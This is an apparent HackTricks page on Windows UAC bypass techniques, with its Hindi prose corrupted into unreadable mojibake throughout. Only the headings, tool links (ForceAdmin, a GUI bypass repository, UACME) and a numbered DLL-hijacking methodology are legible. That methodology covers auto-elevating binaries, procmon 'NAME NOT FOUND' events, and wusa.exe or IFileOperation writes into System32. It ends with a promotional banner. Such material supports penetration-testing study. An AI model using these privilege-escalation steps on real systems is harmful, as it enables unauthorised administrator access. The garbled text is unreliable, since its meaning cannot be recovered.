рд╕рднреА рддрдХрдиреАрдХреЗрдВ рдЬреЛ рдпрд╣рд╛рдБ AUC рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХреА рдЬрд╛рддреА рд╣реИрдВ рдПрдХ рдкреВрд░реНрдг рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рд╢реЗрд▓ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ (рдПрдХ рд╕рд╛рдорд╛рдиреНрдп nc.exe рд╢реЗрд▓ рдкрд░реНрдпрд╛рдкреНрдд рдирд╣реАрдВ рд╣реИ)ред

рдЖрдк meterpreter рд╕рддреНрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдПрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рдорд╛рдЗрдЧреНрд░реЗрдЯ рдХрд░реЗрдВ рдЬрд┐рд╕рдХрд╛ рд╕рддреНрд░ рдорд╛рди 1 рдХреЗ рдмрд░рд╛рдмрд░ рд╣реИ:

(explorer.exe рдХрд╛рдо рдХрд░рдирд╛ рдЪрд╛рд╣рд┐рдП)

UAC Bypass with GUI

рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ GUI рддрдХ рдкрд╣реБрдБрдЪ рд╣реИ рддреЛ рдЖрдк рдЬрдм UAC рдкреНрд░реЙрдореНрдкреНрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВ рддреЛ рдмрд╕ рдЗрд╕реЗ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЖрдкрдХреЛ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдЗрд╕реЗ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИред рдЗрд╕рд▓рд┐рдП, GUI рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ UAC рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрдЧрд╛ред

рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдпрджрд┐ рдЖрдкрдХреЛ рдПрдХ GUI рд╕рддреНрд░ рдорд┐рд▓рддрд╛ рд╣реИ рдЬрд┐рд╕рдХрд╛ рдХреЛрдИ рдФрд░ рдЙрдкрдпреЛрдЧ рдХрд░ рд░рд╣рд╛ рдерд╛ (рд╕рдВрднрд╡рддрдГ RDP рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ) рддреЛ рд╡рд╣рд╛рдБ рдХреБрдЫ рдЙрдкрдХрд░рдг рд╣реЛрдВрдЧреЗ рдЬреЛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓ рд░рд╣реЗ рд╣реЛрдВрдЧреЗ рдЬрд╣рд╛рдБ рд╕реЗ рдЖрдк cmd рдХреЛ рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЗ рд░реВрдк рдореЗрдВ рд╕реАрдзреЗ рдЪрд▓рд╛ рд╕рдХрддреЗ рд╣реИрдВ рдмрд┐рдирд╛ UAC рджреНрд╡рд╛рд░рд╛ рдлрд┐рд░ рд╕реЗ рдкреНрд░реЙрдореНрдкреНрдЯ рдХрд┐рдПред рдЬреИрд╕реЗ https://github.com/oski02/UAC-GUI-Bypass-appverifред рдпрд╣ рдереЛрдбрд╝рд╛ рдЕрдзрд┐рдХ рдЧреБрдкреНрдд рд╣реЛ рд╕рдХрддрд╛ рд╣реИред

Noisy brute-force UAC bypass

рдпрджрд┐ рдЖрдкрдХреЛ рд╢реЛрд░ рдХрд░рдиреЗ рдХреА рдкрд░рд╡рд╛рд╣ рдирд╣реАрдВ рд╣реИ рддреЛ рдЖрдк рд╣рдореЗрд╢рд╛ рдХреБрдЫ рдРрд╕рд╛ рдЪрд▓рд╛ рд╕рдХрддреЗ рд╣реИрдВ https://github.com/Chainski/ForceAdmin рдЬреЛ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЛ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдкреВрдЫрддрд╛ рд╣реИ рдЬрдм рддрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЗрд╕реЗ рд╕реНрд╡реАрдХрд╛рд░ рдирд╣реАрдВ рдХрд░рддрд╛ред

Your own bypass - Basic UAC bypass methodology

рдпрджрд┐ рдЖрдк UACME рдкрд░ рдПрдХ рдирдЬрд╝рд░ рдбрд╛рд▓рддреЗ рд╣реИрдВ рддреЛ рдЖрдк рджреЗрдЦреЗрдВрдЧреЗ рдХрд┐ рдЕрдзрд┐рдХрд╛рдВрд╢ UAC рдмрд╛рдпрдкрд╛рд╕ рдПрдХ Dll Hijacking рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ (рдореБрдЦреНрдп рд░реВрдк рд╕реЗ C:\Windows\System32 рдкрд░ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг dll рд▓рд┐рдЦрдирд╛)ред Dll Hijacking рдХрдордЬреЛрд░реА рдЦреЛрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдЗрд╕реЗ рдкрдврд╝реЗрдВред

  1. рдПрдХ рдмрд╛рдЗрдирд░реА рдЦреЛрдЬреЗрдВ рдЬреЛ autoelevate рдХрд░реЗрдЧрд╛ (рдЬрд╛рдБрдЪ рдХрд░реЗрдВ рдХрд┐ рдЬрдм рдЗрд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рддреЛ рдпрд╣ рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ рдкрд░ рдЪрд▓рддрд╛ рд╣реИ)ред
  2. procmon рдХреЗ рд╕рд╛рде "NAME NOT FOUND" рдШрдЯрдирд╛рдУрдВ рдХреЛ рдЦреЛрдЬреЗрдВ рдЬреЛ DLL Hijacking рдХреЗ рд▓рд┐рдП рдХрдордЬреЛрд░ рд╣реЛ рд╕рдХрддреА рд╣реИрдВред
  3. рдЖрдкрдХреЛ рд╕рдВрднрд╡рддрдГ рдХреБрдЫ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкрдереЛрдВ (рдЬреИрд╕реЗ C:\Windows\System32) рдХреЗ рдЕрдВрджрд░ DLL рд▓рд┐рдЦрдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрдЧреА рдЬрд╣рд╛рдБ рдЖрдкрдХреЗ рдкрд╛рд╕ рд▓рд┐рдЦрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рдирд╣реАрдВ рд╣реИред рдЖрдк рдЗрд╕реЗ рдмрд╛рдпрдкрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
    1. wusa.exe: Windows 7, 8 рдФрд░ 8.1ред рдпрд╣ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкрдереЛрдВ рдХреЗ рдЕрдВрджрд░ CAB рдлрд╝рд╛рдЗрд▓ рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЛ рдирд┐рдХрд╛рд▓рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ (рдХреНрдпреЛрдВрдХрд┐ рдпрд╣ рдЙрдкрдХрд░рдг рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрддрд╛ рд╣реИ)ред
    2. IFileOperation: Windows 10ред
  4. рдПрдХ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рддреИрдпрд╛рд░ рдХрд░реЗрдВ рдЬреЛ рдЖрдкрдХреЗ DLL рдХреЛ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкрде рдХреЗ рдЕрдВрджрд░ рдХреЙрдкреА рдХрд░реЗ рдФрд░ рдХрдордЬреЛрд░ рдФрд░ рдСрдЯреЛрдПрд▓реАрд╡реЗрдЯреЗрдб рдмрд╛рдЗрдирд░реА рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗред

Another UAC bypass technique

рдЗрд╕рдореЗрдВ рдпрд╣ рджреЗрдЦрдирд╛ рд╢рд╛рдорд┐рд▓ рд╣реИ рдХрд┐ рдХреНрдпрд╛ рдПрдХ autoElevated рдмрд╛рдЗрдирд░реА рдкрдВрдЬреАрдХрд░рдг рд╕реЗ рдмрд╛рдЗрдирд░реА рдпрд╛ рдХрдорд╛рдВрдб рдХреЗ рдирд╛рдо/рдкрде рдХреЛ рдкрдврд╝рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреА рд╣реИ рдЬрд┐рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рд╣реИ (рдпрд╣ рдЕрдзрд┐рдХ рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ рдпрджрд┐ рдмрд╛рдЗрдирд░реА рдЗрд╕ рдЬрд╛рдирдХрд╛рд░реА рдХреЛ HKCU рдХреЗ рдЕрдВрджрд░ рдЦреЛрдЬрддреА рд╣реИ)ред

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}